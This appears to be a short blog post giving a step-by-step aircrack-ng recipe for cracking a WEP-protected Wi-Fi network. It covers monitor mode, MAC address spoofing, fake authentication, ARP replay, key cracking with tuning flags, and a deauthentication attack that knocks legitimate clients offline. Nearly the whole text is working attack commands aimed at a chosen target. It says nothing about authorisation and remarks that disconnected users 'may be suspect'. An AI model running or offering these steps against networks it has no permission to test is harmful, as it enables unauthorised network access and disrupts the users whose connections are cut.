1.) Start monitor mode:
airmon-ng
Copy down interface
airmon-ng start (interface)
If it says "mon0" or"wifi0" is used, this is your new interface
If it says other things are running, type "kill (PID#)" for each
2.) Injection test:
aireplay-ng -9 (interface)
The APs that send pings back can be injected
Copy down your targets BSSID, channel & ESSID
aireplay-ng -9 -e (ESSID) -a (BSSID) (interface)
This lets you test specifically, can beuseful for verifying hidden SSIDs or alternative BSSIDs
3.) Target a specific channel:
airmon-ng start (interface) (channel)
4.) Change MAC:
airmon-ng stop (interface(s)
ifconfig (interface) down
macchanger--mac (faked:mac) (interface)
Copy down faked:mac
5.) Begin packet capture:
airodump-ng -c (channel) -w (dump-name) --bssid (BSSID) (new interface)
Keep an eye out for authenticating client’s MACs under Station
If found & step 6 isn’t going well, go back to step 4 and use that MAC
You may have to stop the monitoring interface & the physical one
6.) Fake authentication:
*Put in second shell*
aireplay-ng -1 0 -a (BSSID) -h (faked:mac) (interface)
Successful authentication will continually send keep-alive packets
Using "aireplay-ng -1 6000 -o 1 -q 10 -a (BSSID) -h (faked:mac) (interface)" may help for picky routers
7.) ARP replay:
*Put in third shell*
aireplay-ng -3 -b (BSSID) -h (faked:mac) (interface)
8.) Crack WEP key:
*Put in a fourth shell*
aircrack-ng -b (BSSID) (dump-name)-01.cap
Minimum around 10,000 to 20,000 IVs are needed to crack a 64-bit key & about 40,000 to 85,000 for 128-bit
Try "aircrack-ng -n 64 (dump-name)*cap"every 10,000 IVs
If you know the start of the key in hexadecimal, try running "-d #" where # is the beginning characters
If key bytes are all numbers, try running with "-t" to assume an all numeric key
Add -x2 to brute force the last 2 bytes
If you reach 2,000,000, try changing the fudge factor to "-f 4" & run 30 minutes to an hour
Retry with the fudge factor increased by4 more if that’s unsuccessful
If key bytes all start with similar numbers, try running with "-h" to assume an all ASCII key
Add -x if trying with very few IVs to prevent brute forcing the last 2 bytes
* Other attack methods:
Injection attack with 2 wireless cards:
aireplay -9 -i (receiving interface) (injecting interface)
If fails on Attack -5, make sure the injection interface MAC matches the current card MAC
Deauthentication attack:
aireplay-ng --deauth 5 -a (BSSID) -c (faked:mac) (interface)
Can be faster than an ARP replay, but you must know an authenticated client's MAC who’s online
This will disconnect the authenticated client, so they may be suspect...
0 comments:
Post a Comment